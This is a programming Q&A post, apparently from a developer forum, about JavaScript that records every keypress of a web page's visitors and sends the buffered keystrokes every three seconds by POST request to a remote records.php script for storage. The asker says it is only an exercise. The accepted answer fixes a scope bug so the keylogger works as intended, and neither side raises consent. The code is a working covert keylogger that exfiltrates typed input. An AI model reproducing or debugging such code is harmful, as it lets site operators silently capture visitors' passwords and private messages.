# Sending modified data to a server (with a timer)

Tags: javascript

In the following code sample I want to record and send the keyboard input form the visitor (it's just an exercise for me not for a phishing attack (would be useless for my own site))

```
var data = '';
function update_data(udata)
{
    var http = new XMLHttpRequest();
    var param = encodeURI(udata)
    http.open("POST","http://website.com/records.php",true);
    http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    http.send("data="+param);

    var data = '';
}

document.onkeypress = function(evt)
{
   evt = evt || window.event
   data = data + String.fromCharCode(evt.charCode)
}

timer = setInterval('update_data(data)', 3000);
```

I want to collect the keyboard input 3 seconds long (in a string (var data)), then send them to the server and finally clean the string and collect again.
In the records.php the input is stored in a database.

My problem is that the data variable doesn't change the value to an empty string at the end of the function update_data. So if the user types an 'a' it will send 'a' every three seconds to the server.

Answer (score 0, accepted):

You should refer to the *global* `data` variable and not to a *local* one.

So instead of:

```
    function update_data(udata)
    {
        ...
        var data = '';
    }
```

Write:

```
    function update_data(udata)
    {
        ...
        data = '';
    }
```

This issue has to do with ***Scopes***, read here more about it: [Variable Scope (JavaScript)](http://msdn.microsoft.com/en-us/library/ie/bzt2dkta(v=vs.94).aspx)